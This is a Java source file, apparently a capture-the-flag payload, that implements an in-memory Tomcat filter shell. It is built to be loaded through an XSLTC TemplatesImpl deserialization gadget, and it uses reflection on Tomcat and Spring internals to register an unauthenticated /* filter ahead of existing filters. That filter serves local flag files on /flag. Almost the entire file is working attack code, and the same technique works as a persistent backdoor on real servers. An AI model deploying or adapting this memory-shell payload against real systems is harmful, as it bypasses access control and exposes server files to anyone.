import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
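/**
 * In-memory Tomcat filter that serves the contents of a local "flag" file on {@code /flag}.
 *
 * <p>This is an offensive / CTF payload, not application code. It extends {@link AbstractTranslet},
 * presumably so it can be instantiated by an XSLTC translet loader (TemplatesImpl-style gadget); all
 * of the work happens in the no-arg constructor, which registers {@code this} as a servlet filter on
 * the running Tomcat context via reflection on Tomcat/Spring internals. Things a reviewer or
 * defender should know:
 * <ul>
 *   <li>The registered filter answers to ANY client with no authentication, and
 *       {@code addFilterMapBefore} puts its {@code /*} mapping ahead of every filter already mapped
 *       on the context, so filter-based access control does not see the {@code /flag} request.</li>
 *   <li>The constructor must run on a request thread: it locates the Tomcat context through Spring's
 *       {@code RequestContextHolder} thread-local. Off a request thread it logs an error and does
 *       nothing (the filter is then never registered).</li>
 *   <li>Every step is best-effort and fails silently towards the client; diagnostics are appended to
 *       {@code /tmp/sfs.log}, a persistent on-disk artifact created with the JVM's umask (typically
 *       readable by other local users).</li>
 *   <li>Only {@code javax.servlet} class names are used; on a {@code jakarta.servlet} container the
 *       {@code loadClass} calls fail and registration aborts.</li>
 *   <li>Field names ({@code context}, {@code filterConfigs}) and the {@code ApplicationFilterConfig}
 *       constructor signature are Tomcat-internal and version dependent.</li>
 * </ul>
 */
public class SpringFlagShell3 extends AbstractTranslet implements javax.servlet.Filter {

    /** Name under which the filter is registered in the Tomcat context. */
    private static final String FILTER_NAME = "flagFilter3";

    /** Request path that triggers the flag response; compared exactly, no path normalisation. */
    private static final String FLAG_PATH = "/flag";

    /** Candidate locations of the flag file, probed in this order; the first regular file wins. */
    private static final String[] FLAG_CANDIDATES = {"/flag", "/flag.txt", "/app/flag", "/app/flag.txt"};

    /** Best-effort diagnostics file; opened in append mode, never truncated or removed. */
    private static final String LOG_FILE = "/tmp/sfs.log";

    /**
     * Registers this instance as a Tomcat filter on the context of the current request.
     *
     * <p>Never throws: every failure (no bound request, unexpected Tomcat version, reflection
     * denied, ...) is caught and written to the log file, leaving the container untouched.
     */
    public SpringFlagShell3() {
        try {
            ClassLoader cl = Thread.currentThread().getContextClassLoader();
            // RequestFacade -> ServletContext (ApplicationContextFacade) -> ApplicationContext -> StandardContext,
            // the last two hops through private fields both named "context".
            Object request = currentRequest(cl);
            Object servletContext = call(request, "getServletContext");
            Object appContextFacade = get(servletContext, "context");
            Object appContext = get(appContextFacade, "context");

            Class<?> filterDefClass = cl.loadClass("org.apache.tomcat.util.descriptor.web.FilterDef");
            Object filterDef = registerFilterDef(cl, appContext, filterDefClass);
            registerFilterMap(cl, appContext);
            registerFilterConfig(cl, appContext, filterDefClass, filterDef);
            log("filter3 done");
        } catch (Throwable e) {
            log("filter3 error: " + e);
        }
    }

    /** Builds a FilterDef that points at this already-constructed instance and adds it to the context. */
    private Object registerFilterDef(ClassLoader cl, Object appContext, Class<?> filterDefClass) throws Exception {
        Class<?> filterClass = cl.loadClass("javax.servlet.Filter");
        Object filterDef = filterDefClass.getDeclaredConstructor().newInstance();
        call(filterDef, "setFilterName", new Class[]{String.class}, new Object[]{FILTER_NAME});
        call(filterDef, "setFilterClass", new Class[]{String.class}, new Object[]{this.getClass().getName()});
        // setFilter hands Tomcat the live object, so Tomcat never has to resolve this class by name
        // (it is not on the webapp class path).
        call(filterDef, "setFilter", new Class[]{filterClass}, new Object[]{this});
        call(appContext, "addFilterDef", new Class[]{filterDefClass}, new Object[]{filterDef});
        return filterDef;
    }

    /** Maps the filter to every request path, inserted before all existing filter mappings. */
    private void registerFilterMap(ClassLoader cl, Object appContext) throws Exception {
        Class<?> filterMapClass = cl.loadClass("org.apache.tomcat.util.descriptor.web.FilterMap");
        Object filterMap = filterMapClass.getDeclaredConstructor().newInstance();
        call(filterMap, "setFilterName", new Class[]{String.class}, new Object[]{FILTER_NAME});
        call(filterMap, "addURLPattern", new Class[]{String.class}, new Object[]{"/*"});
        // REQUEST only: the filter is not consulted for FORWARD / INCLUDE / ERROR dispatches.
        call(filterMap, "setDispatcher", new Class[]{String.class}, new Object[]{"REQUEST"});
        call(appContext, "addFilterMapBefore", new Class[]{filterMapClass}, new Object[]{filterMap});
    }

    /**
     * Creates the ApplicationFilterConfig Tomcat normally builds at context start and installs it
     * under {@link #FILTER_NAME} in the context's private {@code filterConfigs} map.
     */
    private void registerFilterConfig(ClassLoader cl, Object appContext, Class<?> filterDefClass, Object filterDef)
            throws Exception {
        Class<?> appFilterConfigClass = cl.loadClass("org.apache.catalina.core.ApplicationFilterConfig");
        Constructor<?> ctor = appFilterConfigClass.getDeclaredConstructor(
                cl.loadClass("org.apache.catalina.Context"), filterDefClass);
        ctor.setAccessible(true);   // the constructor is package-private
        Object filterConfig = ctor.newInstance(appContext, filterDef);
        // NOTE(review): presumably required because the per-request chain is assembled from
        // filterConfigs rather than from the FilterDef list, so the mapping is inert without it;
        // confirm against the target Tomcat version. The put is unsynchronised on a private map.
        Object filterConfigs = get(appContext, "filterConfigs");
        call(filterConfigs, "put", new Class[]{Object.class, Object.class}, new Object[]{FILTER_NAME, filterConfig});
    }

    /**
     * Serves the flag file as {@code text/plain} when the request URI is exactly {@code /flag};
     * otherwise passes the request down the chain unchanged.
     *
     * <p>No authentication or origin check of any kind is performed. Errors are logged; if they
     * occur before anything was written the request continues down the chain as if this filter
     * were absent, if they occur once writing has begun the response is left as-is.
     */
    @Override
    public void doFilter(javax.servlet.ServletRequest request, javax.servlet.ServletResponse response,
                         javax.servlet.FilterChain chain) throws IOException, javax.servlet.ServletException {
        boolean writeStarted = false;
        try {
            Object uri = call(request, "getRequestURI");
            if (uri != null && uri.toString().equals(FLAG_PATH)) {
                byte[] data = readFlag().getBytes(StandardCharsets.UTF_8);
                call(response, "setStatus", new Class[]{int.class}, new Object[]{200});
                call(response, "setContentType", new Class[]{String.class}, new Object[]{"text/plain;charset=UTF-8"});
                Object os = call(response, "getOutputStream");
                writeStarted = true;
                call(os, "write", new Class[]{byte[].class}, new Object[]{data});
                call(os, "flush");
                return;
            }
        } catch (Throwable e) {
            log("doFilter3 error: " + e);
            if (writeStarted) {
                // Part of the body may already be on the wire; handing a half-written response to the
                // rest of the chain would only add an IllegalStateException from downstream code.
                return;
            }
        }
        chain.doFilter(request, response);
    }

    /** No per-filter configuration is needed; Tomcat never calls this for the reflective registration anyway. */
    @Override
    public void init(javax.servlet.FilterConfig filterConfig) {
    }

    /** Nothing to release. */
    @Override
    public void destroy() {
    }

    /**
     * Returns the UTF-8 decoded contents of the first {@link #FLAG_CANDIDATES} entry that is a regular
     * file, or the literal {@code "flag not found"}. Candidates that exist but cannot be read
     * (permissions, races) are skipped silently rather than reported.
     */
    private static String readFlag() {
        for (String candidate : FLAG_CANDIDATES) {
            try {
                File file = new File(candidate);
                if (file.isFile()) {
                    return new String(Files.readAllBytes(file.toPath()), StandardCharsets.UTF_8);
                }
            } catch (Throwable ignored) {
                // best-effort probe: fall through to the next candidate
            }
        }
        return "flag not found";
    }

    /**
     * Returns the servlet request bound to the current thread by Spring's RequestContextHolder.
     *
     * @throws Exception if Spring is not on the class path or no request is bound (the
     *                   {@code getRequest} call then fails on a null target)
     */
    private Object currentRequest(ClassLoader cl) throws Exception {
        Class<?> holderClass = cl.loadClass("org.springframework.web.context.request.RequestContextHolder");
        Object attrs = callStatic(holderClass, "getRequestAttributes");
        return call(attrs, "getRequest");
    }

    /**
     * Reads a field by name from {@code target}, searching the class and all of its superclasses,
     * ignoring access modifiers.
     *
     * @throws NoSuchFieldException if no class in the hierarchy declares the field
     */
    private static Object get(Object target, String name) throws Exception {
        for (Class<?> type = target.getClass(); type != null; type = type.getSuperclass()) {
            try {
                Field field = type.getDeclaredField(name);
                field.setAccessible(true);
                return field.get(target);
            } catch (NoSuchFieldException ignored) {
                // keep walking up the hierarchy
            }
        }
        throw new NoSuchFieldException(name);
    }

    /**
     * Invokes a static no-arg method declared directly on {@code type}. Unlike {@link #findMethod}
     * this does not search superclasses.
     */
    private static Object callStatic(Class<?> type, String name) throws Exception {
        Method method = type.getDeclaredMethod(name);
        method.setAccessible(true);
        return method.invoke(null);
    }

    /** Invokes the no-arg instance method {@code name} on {@code target}. */
    private static Object call(Object target, String name) throws Exception {
        Method method = findMethod(target.getClass(), name, new Class[0]);
        return method.invoke(target);
    }

    /** Invokes the instance method {@code name(types...)} on {@code target} with {@code args}. */
    private static Object call(Object target, String name, Class<?>[] types, Object[] args) throws Exception {
        Method method = findMethod(target.getClass(), name, types);
        return method.invoke(target, args);
    }

    /**
     * Resolves a method by exact name and parameter types: first any (possibly non-public) declaration
     * on the class or a superclass, then falling back to {@link Class#getMethod}, which also covers
     * public methods inherited from interfaces.
     *
     * @throws NoSuchMethodException if neither lookup finds a match
     */
    private static Method findMethod(Class<?> type, String name, Class<?>[] types) throws Exception {
        for (Class<?> current = type; current != null; current = current.getSuperclass()) {
            try {
                Method method = current.getDeclaredMethod(name, types);
                method.setAccessible(true);
                return method;
            } catch (NoSuchMethodException ignored) {
                // not declared here, try the superclass
            }
        }
        Method method = type.getMethod(name, types);
        method.setAccessible(true);
        return method;
    }

    /**
     * Appends one line to {@link #LOG_FILE}. The writer is closed even when the write fails
     * (the original leaked the descriptor in that case); logging failures are swallowed so that
     * they can never break the payload.
     */
    private static void log(String msg) {
        try (FileWriter writer = new FileWriter(LOG_FILE, true)) {
            writer.write(msg + "\n");
        } catch (Throwable ignored) {
            // nowhere else to report this
        }
    }

    /** Required by AbstractTranslet; never used for XSLT. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    /** Required by AbstractTranslet; never used for XSLT. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)
            throws TransletException {
    }
}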